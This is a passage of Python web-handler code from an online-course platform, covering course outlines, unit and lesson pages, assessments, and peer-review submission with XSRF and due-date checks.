unit.needs_human_grader():\n review_steps = rp.get_review_steps_by(\n unit.unit_id, student.get_key())\n review_min_count = unit.workflow.get_review_min_count()\n\n unit.matcher = unit.workflow.get_matcher()\n unit.review_progress = ReviewUtils.get_review_progress(\n review_steps, review_min_count,\n course.get_progress_tracker()\n )\n\n unit.is_submitted = rp.does_submission_exist(\n unit.unit_id, student.get_key())\n\n\ndef is_progress_recorded(handler, student):\n if student.is_transient:\n return False\n if CAN_PERSIST_ACTIVITY_EVENTS:\n return True\n course = handler.get_course()\n units = handler.get_track_matching_student(student)\n for unit in units:\n if unit.manual_progress:\n return True\n for lesson in course.get_lessons(unit.unit_id):\n if lesson.manual_progress:\n return True\n return False\n\n\ndef add_course_outline_to_template(handler, student):\n \"\"\"Adds course outline with all units, lessons, progress to the template.\"\"\"\n _tracker = handler.get_progress_tracker()\n if student and not student.is_transient:\n augment_assessment_units(handler.get_course(), student)\n handler.template_value['course_progress'] = (\n _tracker.get_course_progress(student))\n\n _tuples = []\n units = handler.get_track_matching_student(student)\n 
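# pre/post assessments that belong to a unit are folded into that unit's\n    # outline entry below, so drop them from the top-level list here.\n    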
units = filter_assessments_used_within_units(units)\n progress = _tracker.get_or_create_progress(\n student) if is_progress_recorded(handler, student) else None\n for _unit in units:\n _lessons = handler.get_lessons(_unit.unit_id)\n _lesson_progress = None\n if progress:\n _lesson_progress = _tracker.get_lesson_progress(\n student, _unit.unit_id, progress=progress)\n pre_assessment = None\n if _unit.pre_assessment:\n pre_assessment = handler.find_unit_by_id(_unit.pre_assessment)\n post_assessment = None\n if _unit.post_assessment:\n post_assessment = handler.find_unit_by_id(_unit.post_assessment)\n\n _tuple = (_unit, _lessons, _lesson_progress,\n pre_assessment, post_assessment)\n _tuples.append(_tuple)\n\n handler.template_value['course_outline'] = _tuples\n handler.template_value['unit_progress'] = _tracker.get_unit_progress(\n student, progress=progress)\n\n\nclass CourseHandler(BaseHandler):\n \"\"\"Handler for generating course page.\"\"\"\n\n @classmethod\n def get_child_routes(cls):\n \"\"\"Add child handlers for REST.\"\"\"\n return [('/rest/events', EventsRESTHandler)]\n\n def get(self):\n \"\"\"Handles GET requests.\"\"\"\n models.MemcacheManager.begin_readonly()\n try:\n user = self.personalize_page_and_get_user()\n if user is None:\n self.redirect(\"/../courses\")\n return\n else:\n student = Student.get_enrolled_student_by_email(user.email().lower())\n profile = StudentProfileDAO.get_profile_by_user_id(\n user.user_id())\n self.template_value['has_global_profile'] = profile is not None\n if not student:\n logging.info(\"Student enrolled using their roseboticsStudent account.\")\n ## Enrolling the student using their roseboticsStudent account ##\n roseboticsStudent = self.template_value['rosebotics_student']\n Student.add_new_student_for_current_user(roseboticsStudent.nickname, None, None, labels=None)\n student = Student.get_enrolled_student_by_email(user.email().lower())\n profile = StudentProfileDAO.get_profile_by_user_id(user.user_id())\n\n if (student.is_transient and\n not self.app_context.get_environ()['course']['browsable']):\n self.redirect('/preview')\n return\n\n # If we are on this page due to visiting the course base URL\n # (and not base url plus \"/course\"), redirect registered students\n # to the last page they were looking at.\n last_location = self.get_redirect_location(student)\n if last_location:\n self.redirect(last_location)\n return\n\n tracker = self.get_progress_tracker()\n units = self.get_track_matching_student(student)\n units = filter_assessments_used_within_units(units)\n self.template_value['units'] = units\n self.template_value['show_registration_page'] = True\n\n if student and not student.is_transient:\n augment_assessment_units(self.get_course(), student)\n self.template_value['course_progress'] = (\n tracker.get_course_progress(student))\n elif user:\n profile = StudentProfileDAO.get_profile_by_user_id(\n user.user_id())\n additional_registration_fields = self.app_context.get_environ(\n )['reg_form']['additional_registration_fields']\n if profile is not None and not additional_registration_fields:\n self.template_value['show_registration_page'] = False\n self.template_value['register_xsrf_token'] = (\n XsrfTokenManager.create_xsrf_token('register-post'))\n\n self.template_value['transient_student'] = student.is_transient\n self.template_value['progress'] = tracker.get_unit_progress(student)\n course = self.app_context.get_environ()['course']\n self.template_value['video_exists'] = bool(\n 'main_video' in course and\n 'url' in 
course['main_video'] and\n course['main_video']['url'])\n self.template_value['image_exists'] = bool(\n 'main_image' in course and\n 'url' in course['main_image'] and\n course['main_image']['url'])\n\n self.template_value['is_progress_recorded'] = is_progress_recorded(\n self, student)\n self.template_value['navbar'] = {'course': True}\n finally:\n models.MemcacheManager.end_readonly()\n self.render('course.html')\n\n\nclass UnitHandler(BaseHandler):\n \"\"\"Handler for generating unit page.\"\"\"\n\n class UnitLeftNavElements(object):\n\n def __init__(self, course, unit):\n self._urls = []\n self._index_by_label = {}\n\n if unit.pre_assessment:\n self._index_by_label['assessment.%d' % unit.pre_assessment] = (\n len(self._urls))\n self._urls.append('unit?unit=%s&assessment=%d' % (\n unit.unit_id, unit.pre_assessment))\n\n for lesson in course.get_lessons(unit.unit_id):\n self._index_by_label['lesson.%s' % lesson.lesson_id] = (\n len(self._urls))\n self._urls.append('unit?unit=%s&lesson=%s' % (\n unit.unit_id, lesson.lesson_id))\n\n if lesson.activity and lesson.activity_listed:\n self._index_by_label['activity.%s' % lesson.lesson_id] = (\n len(self._urls))\n self._urls.append('unit?unit=%s&lesson=%s&activity=true' % (\n unit.unit_id, lesson.lesson_id))\n\n if unit.post_assessment:\n self._index_by_label['assessment.%d' % unit.post_assessment] = (\n len(self._urls))\n self._urls.append('unit?unit=%s&assessment=%d' % (\n unit.unit_id, unit.post_assessment))\n\n def get_url_by(self, item_type, item_id, offset):\n index = self._index_by_label['%s.%s' % (item_type, item_id)]\n index += offset\n if index >= 0 and index < len(self._urls):\n return self._urls[index]\n else:\n return None\n\n def get(self):\n \"\"\"Handles GET requests.\"\"\"\n models.MemcacheManager.begin_readonly()\n try:\n student = self.personalize_page_and_get_enrolled(\n supports_transient_student=True)\n if not student:\n return\n\n # Extract incoming args\n unit, lesson, assessment = extract_unit_and_lesson_or_assessment(\n self)\n unit_id = unit.unit_id\n\n # If the unit is not currently available, and the user does not have\n # the permission to see drafts, redirect to the main page.\n available_units = self.get_track_matching_student(student)\n if ((not unit.now_available or unit not in available_units) and\n not courses_module.courses.can_see_drafts(self.app_context)):\n self.redirect('/')\n return\n\n # Set template values for nav bar and page type.\n self.template_value['navbar'] = {'course': True}\n\n # Set template values for a unit and its lesson entities\n self.template_value['unit'] = unit\n self.template_value['unit_id'] = unit.unit_id\n\n # These attributes are needed in order to render questions (with\n # progress indicators) in the lesson body. 
They are used by the\n # custom component renderers in the assessment_tags module.\n self.student = student\n self.unit_id = unit_id\n\n add_course_outline_to_template(self, student)\n self.template_value['is_progress_recorded'] = is_progress_recorded(\n self, student)\n\n if (unit.show_contents_on_one_page and\n 'confirmation' not in self.request.params):\n self._show_all_contents(student, unit)\n else:\n self._show_single_element(student, unit, lesson, assessment)\n\n self._set_gcb_html_element_class()\n finally:\n models.MemcacheManager.end_readonly()\n self.render('unit.html')\n\n def _set_gcb_html_element_class(self):\n \"\"\"Select conditional CSS to hide parts of the unit page.\"\"\"\n\n # TODO(jorr): Add an integration test for this once, LTI producer and\n # consumer code is completely checked in.\n\n gcb_html_element_class = []\n\n if self.request.get('hide-controls') == 'true':\n gcb_html_element_class.append('hide-controls')\n\n if self.request.get('hide-lesson-title') == 'true':\n gcb_html_element_class.append('hide-lesson-title')\n\n self.template_value['gcb_html_element_class'] = (\n ' '.join(gcb_html_element_class))\n\n def _apply_gcb_tags(self, text):\n return jinja_utils.get_gcb_tags_filter(self)(text)\n\n def _show_all_contents(self, student, unit):\n course = self.get_course()\n display_content = []\n left_nav_elements = UnitHandler.UnitLeftNavElements(\n self.get_course(), unit)\n\n if unit.unit_header:\n display_content.append(self._apply_gcb_tags(unit.unit_header))\n\n if unit.pre_assessment:\n display_content.append(self.get_assessment_display_content(\n student, unit, course.find_unit_by_id(unit.pre_assessment),\n left_nav_elements, {}))\n\n for lesson in course.get_lessons(unit.unit_id):\n self.lesson_id = lesson.lesson_id\n self.lesson_is_scored = lesson.scored\n template_values = copy.copy(self.template_value)\n self.set_lesson_content(student, unit, lesson, left_nav_elements,\n template_values)\n display_content.append(self.render_template_to_html(\n template_values, 'lesson_common.html'))\n del self.lesson_id\n del self.lesson_is_scored\n\n if unit.post_assessment:\n display_content.append(self.get_assessment_display_content(\n student, unit, course.find_unit_by_id(unit.post_assessment),\n left_nav_elements, {}))\n\n if unit.unit_footer:\n display_content.append(self._apply_gcb_tags(unit.unit_footer))\n\n self.template_value['display_content'] = display_content\n\n def _showing_first_element(self, unit, lesson, assessment, is_activity):\n \"\"\"Whether the unit page is showing the first element of a Unit.\"\"\"\n\n # If the unit has a pre-assessment, then that's the first element;\n # we are showing the first element iff we are showing that assessment.\n if unit.pre_assessment:\n return (assessment and\n str(assessment.unit_id) == str(unit.pre_assessment))\n\n # If there is no pre-assessment, there may be lessons. If there\n # are any lessons, then the first element is the first unit component.\n # Iff we are showing that lesson, we're on the first component.\n unit_lessons = self.get_course().get_lessons(unit.unit_id)\n if unit_lessons:\n if lesson and lesson.lesson_id == unit_lessons[0].lesson_id:\n # If the first lesson has an activity, then we are showing\n # the first element if we are showing the lesson, and not\n # the activity.\n return not is_activity\n return False\n\n # If there is no pre-assessment and no lessons, then the post-assessment\n # is the first element. 
We are on the first element if we're showing\n # that assessment.\n if unit.post_assessment:\n return (assessment and\n str(assessment.unit_id) == str(unit.post_assessment))\n\n # If unit has no pre-assessment, no lessons, and no post-assessment,\n # then we're both at the first and last item.\n if (not unit.pre_assessment and\n not unit.post_assessment and\n not unit_lessons):\n return True\n\n return False\n\n def _showing_last_element(self, unit, lesson, assessment, is_activity):\n \"\"\"Whether the unit page is showing the last element of a Unit.\"\"\"\n\n # If the unit has a post-assessment, then that's the last element;\n # we are showing the last element iff we are showing that assessment.\n if unit.post_assessment:\n return (assessment and\n str(assessment.unit_id) == str(unit.post_assessment))\n\n # If there is no post-assessment, there may be lessons. If there\n # are any lessons, then the last element is the last unit component.\n # Iff we are showing that lesson, we're on the last component.\n unit_lessons = self.get_course().get_lessons(unit.unit_id)\n if unit_lessons:\n if lesson and lesson.lesson_id == unit_lessons[-1].lesson_id:\n # If the lesson has an activity, and we're showing the\n # activity, that's last.\n return is_activity == lesson.has_activity\n return False\n\n # If there is no post-assessment and there are no lessons, then\n # the pre-assessment is the last item in the unit. We are on the\n # last element if we're showing that assessment.\n if unit.pre_assessment:\n return (assessment and\n str(assessment.unit_id) == str(unit.pre_assessment))\n\n # If unit has no pre-assessment, no lessons, and no post-assessment,\n # then we're both at the first and last item.\n if (not unit.pre_assessment and\n not unit.post_assessment and\n not unit_lessons):\n return True\n\n return False\n\n def _show_single_element(self, student, unit, lesson, assessment):\n # Add markup to page which depends on the kind of content.\n left_nav_elements = UnitHandler.UnitLeftNavElements(\n self.get_course(), unit)\n\n # need 'activity' to be True or False, and not the string 'true' or None\n # pylint: disable-msg=g-explicit-bool-comparison\n is_activity = (self.request.get('activity') != '' or\n '/activity' in self.request.path)\n display_content = []\n if (unit.unit_header and\n self._showing_first_element(unit, lesson, assessment, is_activity)):\n display_content.append(self._apply_gcb_tags(unit.unit_header))\n if assessment:\n if 'confirmation' in self.request.params:\n self.set_confirmation_content(student, unit, assessment,\n left_nav_elements)\n self.template_value['assessment_name'] = (\n self.template_value.get('assessment_name').lower())\n display_content.append(self.render_template_to_html(\n self.template_value, 'test_confirmation_content.html'))\n else:\n display_content.append(self.get_assessment_display_content(\n student, unit, assessment, left_nav_elements,\n self.template_value))\n elif lesson:\n self.lesson_id = lesson.lesson_id\n self.lesson_is_scored = lesson.scored\n if is_activity:\n self.set_activity_content(student, unit, lesson,\n left_nav_elements)\n else:\n self.set_lesson_content(student, unit, lesson,\n left_nav_elements, self.template_value)\n display_content.append(self.render_template_to_html(\n self.template_value, 'lesson_common.html'))\n if (unit.unit_footer and\n self._showing_last_element(unit, lesson, assessment, is_activity)):\n display_content.append(self._apply_gcb_tags(unit.unit_footer))\n self.template_value['display_content'] = 
display_content\n\n def get_assessment_display_content(self, student, unit, assessment,\n left_nav_elements, template_values):\n template_values['page_type'] = ASSESSMENT_PAGE_TYPE\n template_values['assessment'] = assessment\n template_values['back_button_url'] = left_nav_elements.get_url_by(\n 'assessment', assessment.unit_id, -1)\n template_values['next_button_url'] = left_nav_elements.get_url_by(\n 'assessment', assessment.unit_id, 1)\n\n assessment_handler = AssessmentHandler()\n assessment_handler.app_context = self.app_context\n assessment_handler.request = self.request\n return assessment_handler.get_assessment_content(\n student, self.get_course(), assessment, as_lesson=True)\n\n def set_confirmation_content(self, student, unit, assessment,\n left_nav_elements):\n course = self.get_course()\n self.template_value['page_type'] = ASSESSMENT_CONFIRMATION_PAGE_TYPE\n self.template_value['unit'] = unit\n self.template_value['assessment'] = assessment\n self.template_value['is_confirmation'] = True\n self.template_value['assessment_name'] = assessment.title\n self.template_value['score'] = (\n course.get_score(student, str(assessment.unit_id)))\n self.template_value['is_last_assessment'] = (\n course.is_last_assessment(assessment))\n self.template_value['overall_score'] = (\n course.get_overall_score(student))\n self.template_value['result'] = course.get_overall_result(student)\n self.template_value['back_button_url'] = left_nav_elements.get_url_by(\n 'assessment', assessment.unit_id, 0)\n self.template_value['next_button_url'] = left_nav_elements.get_url_by(\n 'assessment', assessment.unit_id, 1)\n\n def set_activity_content(self, student, unit, lesson, left_nav_elements):\n self.template_value['page_type'] = ACTIVITY_PAGE_TYPE\n self.template_value['lesson'] = lesson\n self.template_value['lesson_id'] = lesson.lesson_id\n self.template_value['back_button_url'] = left_nav_elements.get_url_by(\n 'activity', lesson.lesson_id, -1)\n self.template_value['next_button_url'] = left_nav_elements.get_url_by(\n 'activity', lesson.lesson_id, 1)\n self.template_value['activity'] = {\n 'title': lesson.activity_title,\n 'activity_script_src': (\n self.get_course().get_activity_filename(unit.unit_id,\n lesson.lesson_id))}\n self.template_value['page_type'] = 'activity'\n self.template_value['title'] = lesson.activity_title\n\n if is_progress_recorded(self, student):\n # Mark this page as accessed. This is done after setting the\n # student progress template value, so that the mark only shows up\n # after the student visits the page for the first time.\n self.get_course().get_progress_tracker().put_activity_accessed(\n student, unit.unit_id, lesson.lesson_id)\n\n def set_lesson_content(self, student, unit, lesson, left_nav_elements,\n template_values):\n template_values['page_type'] = UNIT_PAGE_TYPE\n template_values['lesson'] = lesson\n template_values['lesson_id'] = lesson.lesson_id\n template_values['back_button_url'] = left_nav_elements.get_url_by(\n 'lesson', lesson.lesson_id, -1)\n template_values['next_button_url'] = left_nav_elements.get_url_by(\n 'lesson', lesson.lesson_id, 1)\n template_values['page_type'] = 'unit'\n template_values['title'] = lesson.title\n\n if not lesson.manual_progress and is_progress_recorded(self, student):\n # Mark this page as accessed. 
This is done after setting the\n # student progress template value, so that the mark only shows up\n # after the student visits the page for the first time.\n self.get_course().get_progress_tracker().put_html_accessed(\n student, unit.unit_id, lesson.lesson_id)\n\n\nclass AssessmentHandler(BaseHandler):\n \"\"\"Handler for generating assessment page.\"\"\"\n\n # pylint: disable-msg=too-many-statements\n def get(self):\n \"\"\"Handles GET requests.\"\"\"\n student = self.personalize_page_and_get_enrolled(\n supports_transient_student=True)\n if not student:\n return\n\n # Extract incoming args, binding to self if needed.\n assessment_name = self.request.get('name')\n self.unit_id = assessment_name\n course = self.get_course()\n unit = course.find_unit_by_id(self.unit_id)\n if not unit:\n self.error(404)\n return\n\n # If assessment is used as a pre/post within a unit, go see that view.\n parent_unit = course.get_parent_unit(self.unit_id)\n if parent_unit:\n self.redirect('/unit?unit=%s&assessment=%s' %\n (parent_unit.unit_id, self.unit_id))\n return\n\n # If the assessment is not currently available, and the user does not\n # have the permission to see drafts redirect to the main page.\n if (not unit.now_available and\n not courses_module.courses.can_see_drafts(self.app_context)):\n self.redirect('/')\n return\n\n self.template_value['main_content'] = (\n self.get_assessment_content(student, course, unit, as_lesson=False))\n self.template_value['assessment_name'] = assessment_name\n self.template_value['unit_id'] = self.unit_id\n self.template_value['navbar'] = {'course': True}\n self.render('assessment_page.html')\n\n def get_assessment_content(self, student, course, unit, as_lesson):\n model_version = course.get_assessment_model_version(unit)\n assert model_version in courses.SUPPORTED_ASSESSMENT_MODEL_VERSIONS\n self.template_value['model_version'] = model_version\n\n if model_version == courses.ASSESSMENT_MODEL_VERSION_1_4:\n configure_readonly_view = self.configure_readonly_view_1_4\n configure_active_view = self.configure_active_view_1_4\n get_review_received = self.get_review_received_1_4\n elif model_version == courses.ASSESSMENT_MODEL_VERSION_1_5:\n configure_readonly_view = self.configure_readonly_view_1_5\n configure_active_view = self.configure_active_view_1_5\n get_review_received = self.get_review_received_1_5\n else:\n raise ValueError('Bad assessment model version: %s' % model_version)\n\n self.template_value['unit_id'] = unit.unit_id\n self.template_value['as_lesson'] = as_lesson\n self.template_value['assessment_title'] = unit.title\n self.template_value['assessment_xsrf_token'] = (\n XsrfTokenManager.create_xsrf_token('assessment-post'))\n self.template_value['event_xsrf_token'] = (\n XsrfTokenManager.create_xsrf_token('event-post'))\n\n self.template_value['grader'] = unit.workflow.get_grader()\n\n readonly_view = False\n due_date_exceeded = False\n submission_contents = None\n review_steps_for = []\n\n submission_due_date = unit.workflow.get_submission_due_date()\n if submission_due_date:\n self.template_value['submission_due_date'] = (\n submission_due_date.strftime(HUMAN_READABLE_DATETIME_FORMAT))\n\n time_now = datetime.datetime.now()\n if time_now > submission_due_date:\n readonly_view = True\n due_date_exceeded = True\n self.template_value['due_date_exceeded'] = True\n\n if course.needs_human_grader(unit) and not student.is_transient:\n self.template_value['matcher'] = unit.workflow.get_matcher()\n\n rp = course.get_reviews_processor()\n review_steps_by = 
rp.get_review_steps_by(\n unit.unit_id, student.get_key())\n\n # Determine if the student can see others' reviews of his/her work.\n if (ReviewUtils.has_completed_enough_reviews(\n review_steps_by, unit.workflow.get_review_min_count())):\n submission_and_review_steps = (\n rp.get_submission_and_review_steps(\n unit.unit_id, student.get_key()))\n\n if submission_and_review_steps:\n submission_contents = submission_and_review_steps[0]\n review_steps_for = submission_and_review_steps[1]\n\n review_keys_for_student = []\n for review_step in review_steps_for:\n can_show_review = (\n review_step.state == domain.REVIEW_STATE_COMPLETED\n and not review_step.removed\n and review_step.review_key\n )\n\n if can_show_review:\n review_keys_for_student.append(review_step.review_key)\n\n reviews_for_student = rp.get_reviews_by_keys(\n unit.unit_id, review_keys_for_student)\n\n self.template_value['reviews_received'] = [get_review_received(\n unit, review) for review in reviews_for_student]\n else:\n submission_contents = student_work.Submission.get_contents(\n unit.unit_id, student.get_key())\n\n # Determine whether to show the assessment in readonly mode.\n if submission_contents or due_date_exceeded:\n readonly_view = True\n configure_readonly_view(unit, submission_contents)\n\n if not readonly_view:\n if not student.is_transient:\n submission_contents = student_work.Submission.get_contents(\n unit.unit_id, student.get_key())\n configure_active_view(unit, submission_contents)\n\n return self.render_template_to_html(\n self.template_value, 'assessment.html')\n\n def configure_readonly_view_1_4(self, unit, submission_contents):\n self.template_value['readonly_student_assessment'] = (\n create_readonly_assessment_params(\n self.get_course().get_assessment_content(unit),\n StudentWorkUtils.get_answer_list(submission_contents)))\n\n def configure_readonly_view_1_5(self, unit, submission_contents):\n self.template_value['readonly_student_assessment'] = True\n self.template_value['html_content'] = unit.html_content\n self.template_value['html_saved_answers'] = transforms.dumps(\n submission_contents)\n\n def configure_active_view_1_4(self, unit, submission_contents):\n self.template_value['assessment_script_src'] = (\n self.get_course().get_assessment_filename(unit.unit_id))\n if submission_contents:\n # If a previous submission exists, reinstate it.\n self.template_value['saved_answers'] = transforms.dumps(\n StudentWorkUtils.get_answer_list(submission_contents))\n\n def configure_active_view_1_5(self, unit, submission_contents):\n self.template_value['html_content'] = unit.html_content\n self.template_value['html_check_answers'] = unit.html_check_answers\n if submission_contents:\n # If a previous submission exists, reinstate it.\n self.template_value['html_saved_answers'] = transforms.dumps(\n submission_contents)\n\n def get_review_received_1_4(self, unit, review):\n return create_readonly_assessment_params(\n self.get_course().get_review_content(unit),\n StudentWorkUtils.get_answer_list(review))\n\n def get_review_received_1_5(self, unit, review):\n return {\n 'content': unit.html_review_form,\n 'saved_answers': transforms.dumps(review)\n }\n\n\nclass ReviewDashboardHandler(BaseHandler):\n \"\"\"Handler for generating the index of reviews that a student has to do.\"\"\"\n\n def _populate_template(self, course, unit, review_steps):\n \"\"\"Adds variables to the template for the review dashboard.\"\"\"\n self.template_value['assessment_name'] = unit.title\n self.template_value['unit_id'] = unit.unit_id\n\n 
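# an assessment embedded in a unit as its pre/post assessment links back to\n        # that unit's page; a standalone assessment links back to its own page.\n        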
parent_unit = course.get_parent_unit(unit.unit_id)\n\n if parent_unit is not None:\n self.template_value['back_link'] = 'unit?unit=%s&assessment=%s' % (\n parent_unit.unit_id, unit.unit_id)\n else:\n self.template_value['back_link'] = (\n 'assessment?name=%s' % unit.unit_id)\n\n self.template_value['event_xsrf_token'] = (\n XsrfTokenManager.create_xsrf_token('event-post'))\n self.template_value['review_dashboard_xsrf_token'] = (\n XsrfTokenManager.create_xsrf_token('review-dashboard-post'))\n\n self.template_value['REVIEW_STATE_COMPLETED'] = (\n domain.REVIEW_STATE_COMPLETED)\n\n self.template_value['review_steps'] = review_steps\n self.template_value['review_min_count'] = (\n unit.workflow.get_review_min_count())\n\n review_due_date = unit.workflow.get_review_due_date()\n if review_due_date:\n self.template_value['review_due_date'] = review_due_date.strftime(\n HUMAN_READABLE_DATETIME_FORMAT)\n\n time_now = datetime.datetime.now()\n self.template_value['due_date_exceeded'] = (time_now > review_due_date)\n\n def get(self):\n \"\"\"Handles GET requests.\"\"\"\n student = self.personalize_page_and_get_enrolled()\n if not student:\n return\n\n course = self.get_course()\n rp = course.get_reviews_processor()\n unit, _ = extract_unit_and_lesson(self)\n if not unit:\n self.error(404)\n return\n\n self.template_value['navbar'] = {'course': True}\n\n if not course.needs_human_grader(unit):\n self.error(404)\n return\n\n # Check that the student has submitted the corresponding assignment.\n if not rp.does_submission_exist(unit.unit_id, student.get_key()):\n self.template_value['error_code'] = (\n 'cannot_review_before_submitting_assignment')\n self.render('error.html')\n return\n\n review_steps = rp.get_review_steps_by(unit.unit_id, student.get_key())\n\n self._populate_template(course, unit, review_steps)\n required_review_count = unit.workflow.get_review_min_count()\n\n # The student can request a new submission if:\n # - all his/her current reviews are in Draft/Completed state, and\n # - he/she is not in the state where the required number of reviews\n # has already been requested, but not all of these are completed.\n self.template_value['can_request_new_review'] = (\n len(review_steps) < required_review_count or\n ReviewUtils.has_completed_all_assigned_reviews(review_steps)\n )\n self.render('review_dashboard.html')\n\n def post(self):\n \"\"\"Allows a reviewer to request a new review.\"\"\"\n student = self.personalize_page_and_get_enrolled()\n if not student:\n return\n\n if not self.assert_xsrf_token_or_fail(\n self.request, 'review-dashboard-post'):\n return\n\n course = self.get_course()\n unit, unused_lesson = extract_unit_and_lesson(self)\n if not unit:\n self.error(404)\n return\n\n rp = course.get_reviews_processor()\n review_steps = rp.get_review_steps_by(unit.unit_id, student.get_key())\n self.template_value['navbar'] = {'course': True}\n\n if not course.needs_human_grader(unit):\n self.error(404)\n return\n\n # Check that the student has submitted the corresponding assignment.\n if not rp.does_submission_exist(unit.unit_id, student.get_key()):\n self.template_value['error_code'] = (\n 'cannot_review_before_submitting_assignment')\n self.render('error.html')\n return\n\n # Check that the review due date has not passed.\n time_now = datetime.datetime.now()\n review_due_date = unit.workflow.get_review_due_date()\n if time_now > review_due_date:\n self.template_value['error_code'] = (\n 'cannot_request_review_after_deadline')\n self.render('error.html')\n return\n\n # Check that the 
student can request a new review.\n review_min_count = unit.workflow.get_review_min_count()\n can_request_new_review = (\n len(review_steps) < review_min_count or\n ReviewUtils.has_completed_all_assigned_reviews(review_steps))\n if not can_request_new_review:\n self.template_value['review_min_count'] = review_min_count\n self.template_value['error_code'] = 'must_complete_more_reviews'\n self.render('error.html')\n return\n\n self.template_value['no_submissions_available'] = True\n\n try:\n review_step_key = rp.get_new_review(unit.unit_id, student.get_key())\n redirect_params = {\n 'key': review_step_key,\n 'unit': unit.unit_id,\n }\n self.redirect('/review?%s' % urllib.urlencode(redirect_params))\n except Exception: # pylint: disable-msg=broad-except\n review_steps = rp.get_review_steps_by(\n unit.unit_id, student.get_key())\n self._populate_template(course, unit, review_steps)\n self.render('review_dashboard.html')\n\n\nclass ReviewHandler(BaseHandler):\n \"\"\"Handler for generating the submission page for individual reviews.\"\"\"\n\n # pylint: disable-msg=too-many-statements\n def get(self):\n \"\"\"Handles GET requests.\"\"\"\n student = self.personalize_page_and_get_enrolled()\n if not student:\n return\n\n course = self.get_course()\n rp = course.get_reviews_processor()\n unit, unused_lesson = extract_unit_and_lesson(self)\n\n if not course.needs_human_grader(unit):\n self.error(404)\n return\n\n review_step_key = self.request.get('key')\n if not unit or not review_step_key:\n self.error(404)\n return\n\n try:\n review_step_key = db.Key(encoded=review_step_key)\n review_step = rp.get_review_steps_by_keys(\n unit.unit_id, [review_step_key])[0]\n except Exception: # pylint: disable-msg=broad-except\n self.error(404)\n return\n\n if not review_step:\n self.error(404)\n return\n\n # Check that the student is allowed to review this submission.\n if not student.has_same_key_as(review_step.reviewer_key):\n self.error(404)\n return\n\n model_version = course.get_assessment_model_version(unit)\n assert model_version in courses.SUPPORTED_ASSESSMENT_MODEL_VERSIONS\n self.template_value['model_version'] = model_version\n\n if model_version == courses.ASSESSMENT_MODEL_VERSION_1_4:\n configure_assessment_view = self.configure_assessment_view_1_4\n configure_readonly_review = self.configure_readonly_review_1_4\n configure_active_review = self.configure_active_review_1_4\n elif model_version == courses.ASSESSMENT_MODEL_VERSION_1_5:\n configure_assessment_view = self.configure_assessment_view_1_5\n configure_readonly_review = self.configure_readonly_review_1_5\n configure_active_review = self.configure_active_review_1_5\n else:\n raise ValueError('Bad assessment model version: %s' % model_version)\n\n self.template_value['navbar'] = {'course': True}\n self.template_value['unit_id'] = unit.unit_id\n self.template_value['key'] = review_step_key\n\n submission_key = review_step.submission_key\n submission_contents = student_work.Submission.get_contents_by_key(\n submission_key)\n\n configure_assessment_view(unit, submission_contents)\n\n review_due_date = unit.workflow.get_review_due_date()\n if review_due_date:\n self.template_value['review_due_date'] = review_due_date.strftime(\n HUMAN_READABLE_DATETIME_FORMAT)\n\n review_key = review_step.review_key\n rev = rp.get_reviews_by_keys(\n unit.unit_id, [review_key])[0] if review_key else None\n\n time_now = datetime.datetime.now()\n show_readonly_review = (\n review_step.state == domain.REVIEW_STATE_COMPLETED or\n time_now > review_due_date)\n\n 
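# A review is shown read-only once it has been marked completed or once\n        # the review deadline has passed.\n        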
self.template_value['due_date_exceeded'] = (time_now > review_due_date)\n\n if show_readonly_review:\n configure_readonly_review(unit, rev)\n else:\n # Populate the review form,\n configure_active_review(unit, rev)\n\n self.template_value['assessment_xsrf_token'] = (\n XsrfTokenManager.create_xsrf_token('review-post'))\n self.template_value['event_xsrf_token'] = (\n XsrfTokenManager.create_xsrf_token('event-post'))\n\n self.render('review.html')\n\n def configure_assessment_view_1_4(self, unit, submission_contents):\n readonly_student_assessment = create_readonly_assessment_params(\n self.get_course().get_assessment_content(unit),\n StudentWorkUtils.get_answer_list(submission_contents))\n self.template_value[\n 'readonly_student_assessment'] = readonly_student_assessment\n\n def configure_assessment_view_1_5(self, unit, submission_contents):\n self.template_value['html_review_content'] = unit.html_content\n self.template_value['html_reviewee_answers'] = transforms.dumps(\n submission_contents)\n\n def configure_readonly_review_1_4(self, unit, review_contents):\n readonly_review_form = create_readonly_assessment_params(\n self.get_course().get_review_content(unit),\n StudentWorkUtils.get_answer_list(review_contents))\n self.template_value['readonly_review_form'] = readonly_review_form\n\n def configure_readonly_review_1_5(self, unit, review_contents):\n self.template_value['readonly_review_form'] = True\n self.template_value['html_review_form'] = unit.html_review_form\n self.template_value['html_review_answers'] = transforms.dumps(\n review_contents)\n\n def configure_active_review_1_4(self, unit, review_contents):\n self.template_value['assessment_script_src'] = (\n self.get_course().get_review_filename(unit.unit_id))\n saved_answers = (\n StudentWorkUtils.get_answer_list(review_contents)\n if review_contents else [])\n self.template_value['saved_answers'] = transforms.dumps(saved_answers)\n\n def configure_active_review_1_5(self, unit, review_contents):\n self.template_value['html_review_form'] = unit.html_review_form\n self.template_value['html_review_answers'] = transforms.dumps(\n review_contents)\n\n def post(self):\n \"\"\"Handles POST requests, when a reviewer submits a review.\"\"\"\n student = self.personalize_page_and_get_enrolled()\n if not student:\n return\n\n if not self.assert_xsrf_token_or_fail(self.request, 'review-post'):\n return\n\n course = self.get_course()\n rp = course.get_reviews_processor()\n\n unit_id = self.request.get('unit_id')\n unit = self.find_unit_by_id(unit_id)\n if not unit or not course.needs_human_grader(unit):\n self.error(404)\n return\n\n review_step_key = self.request.get('key')\n if not review_step_key:\n self.error(404)\n return\n\n try:\n review_step_key = db.Key(encoded=review_step_key)\n review_step = rp.get_review_steps_by_keys(\n unit.unit_id, [review_step_key])[0]\n except Exception: # pylint: disable-msg=broad-except\n self.error(404)\n return\n\n # Check that the student is allowed to review this submission.\n if not student.has_same_key_as(review_step.reviewer_key):\n self.error(404)\n return\n\n self.template_value['navbar'] = {'course': True}\n self.template_value['unit_id'] = unit.unit_id\n\n # Check that the review due date has not passed.\n time_now = datetime.datetime.now()\n review_due_date = unit.workflow.get_review_due_date()\n if time_now > review_due_date:\n self.template_value['time_now'] = time_now.strftime(\n HUMAN_READABLE_DATETIME_FORMAT)\n self.template_value['review_due_date'] = (\n 
